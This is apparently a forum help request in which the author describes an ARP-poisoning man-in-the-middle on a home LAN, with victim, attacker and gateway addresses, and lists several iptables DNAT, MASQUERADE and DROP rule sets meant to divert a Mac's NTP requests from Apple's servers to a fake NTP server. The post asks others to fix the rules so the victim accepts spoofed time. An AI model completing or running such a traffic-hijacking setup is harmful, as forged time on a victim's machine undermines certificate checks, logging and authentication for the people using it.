CONFIGURATIONS
ipv4.forwarding 1 (ON)
arp_cache_poisoning between VICTIM & D.G.. (192.168.1.100 & 192.168.1.1)
**LAN**
VICTIM: 192.168.1.100
ATTACKER: 192.168.1.105
DEFAULT GATEAWAY: 192.168.1.1
**WAN**
NTP SERVERS: 17.253.52.125
17.253.52.253
17.253.34.125
17.253.34.125
NORMAL BEHAVIOUR OF NTPv4 PROTOCOL
MAC machine sends NTPv4 request to one of the Apple's NTP server (NTP pool). As a reply it gets NTPv4 response updated time. The frequency between time updates 15 minutes. Since, there is not any security checks by default in NTPv4, it vulnerable to Replay attack.
MALICIOUS BEHAVIOR
The attacker runs MITM and eavesdropping the traffic until it gets NTPv4 request from VICTIM. Once the request received, it has to be redirected to FAKE NTP SERVER running on ATTACKER's machine, then it reply with fake time to the VICTIM so that it will update its time.
ISSUES
It could be achieved by using iptables. I am stating it as it have done it before and it was working for me. However, I lost my configurations. Now, the situation is that I tried to run a few different iptables settings such as:
iptables -t nat -A PREROUTING -s 192.168.1.100 -p udp --dport 123 -j DNAT --to-destination 192.168.1.105:123
iptables -t nat -A POSTROUTING -j MASQUERADE
FINDINGS
My logging NTP servers shows the following logging:
Sent to 192.168.1.100:55321 Sent to 192.168.1.199:54623
which indicates that NTP request are being redirected to the FAKE NTP server. However, FAKE NTP replies are not delivered to the VICTIM as expected.
Another capture is from Wireshark sniffer.
It shows that VICTIM sends NTPv4 request to Apple's NTP server via ATTACKER's machine, and gets back NTPv4 response back from the same Apple's NTP server via ATTACKER's host.
MY ATTEMPTS
Attempt: 1.
iptables -t nat -A PREROUTING -s 192.168.1.100 -p udp --dport 123 -j DNAT --to-destination 192.168.1.105:123
iptables -t nat -A POSTROUTING -p udp -j MASQUERADE
iptables -A OUTPUT -p udp --dport 123 -j DNAT --to-destination 192.168.1.105:123
***notes It didn't work at first hour (15mins + 15 + 15 + 15), and I decided to leave it for a night. When I came back after 7 hours, it appeared updated the time as expected. It is very unsual, and definitely something going wrong. To me, it seems like FAKE NTP SERVER won a race of updating NTP response from Apple's NTP server.
Attempt: 2.
I have tried to run the following:
iptables -t nat -A PREROUTING -s 192.168.1.100 -p udp --dport 123 -j DNAT --to-destination 192.168.1.105:123
iptables -t nat -A POSTROUTING -p udp -j MASQUERADE
iptables -A INPUT -s 17.253.0.0/16 -p udp -j DROP
***notes It didn't work at all, and even incoming NTP traffic from Apple's NTP server responses weren't blocked.
At the end, I have tried many different scenarious with iptables, and seeking for you help guys to feed the VICTIM' machine with my FAKE NTP response packet so that it get time updates from my FAKE NTP SERVER, not the Apple's NTP pool using iptables.
Thank you in advance!
